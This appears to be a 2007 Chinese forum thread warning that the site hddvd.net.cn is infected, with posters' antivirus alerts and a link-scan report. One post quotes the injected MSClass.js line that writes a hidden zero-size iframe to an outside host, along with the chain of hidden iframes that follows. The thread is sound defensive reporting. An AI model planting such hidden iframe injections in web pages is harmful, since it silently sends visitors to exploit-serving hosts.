毒网

nosferatu

www.hddvd.net.cn

lovewei

这是我第一次见到的真正不弹不闪的网马，但是还是一样，溢出型狂吃内存
挂马方式，主页里面有个MSClass.js，在这个js里面挂了一句document.write('<iframe width=0 height=0 src=http://52nuli.cn></iframe>')，由这个52nuli.cn追出<iframe src=http://da.hhai01.com/goldip.htm?007 style="display:none"></iframe>，继续出：
<HTML>
<body style="CURSOR: url(wm/xjz2007.bmp)"></body>
<iframe width='100' height='100' src='wm/g15.htm'></iframe>
<iframe width='100' height='100' src='wm/dm.htm'></iframe>
<DIV style="display:none"><script language="javascript" type="text/javascript" src="http://js.users.51.1a/1531419.js"></script><script language="javascript" src="http://ww1.tongji123.com/g1.aspx?id=13111651"></script>
</DIV>

yclidong

木马名称:Trojan-Downloader.Win32.Agent.nyi

程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\TEMP\TEMPORARY INTERNET FILES\CONTENT.IE5\PZIS2LMW\DOWN[1].EXE
是木马程序!
已成功阻止其运行,是否要删除此文件?

程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\TEMP\~~.EXE
是木马程序!
已成功阻止其运行,是否要删除此文件?

cy6266812

红伞


Exported events:

2007-12-20 15:18 [Guard] Malware found
      Virus or unwanted program 'HEUR/Exploit.HTML [HEUR/Exploit.HTML]'
      detected in file 'C:\Documents and Settings\Administrator\Local
      Settings\Temporary Internet Files\Content.IE5\UZ1DQOEP\MSClass[1].js.
      Action performed: Move file to quarantine

wusuobuzai

的确是毒网,我的ESS报了.

qigang

1) http://www.hddvd.net.cn :  
2) http://www.hddvd.net.cn/css.css :  
3) http://www.hddvd.net.cn/hd/ad.asp?id=A2 : 未找到网页
4) http://www.hddvd.net.cn/MSClass.js :  
5) http://www.hddvd.net.cn/ad.asp?id=A4 : 未找到网页
6) http://www.hddvd.net.cn/shop_list.asp?id=1 : 未找到网页
7) http://www.hddvd.net.cn/bbs_list.asp?id=1 : 未找到网页
8) http://www.hddvd.net.cn/ad.asp?id=A5 : 未找到网页
9) http://ww.50bang.com/click.js?user_id=219015&l=8 : 未找到网页


危险的链接：1
安全的链接：2
失效的链接：6
页面总数量：9
点击打开网站
点击查看详细报告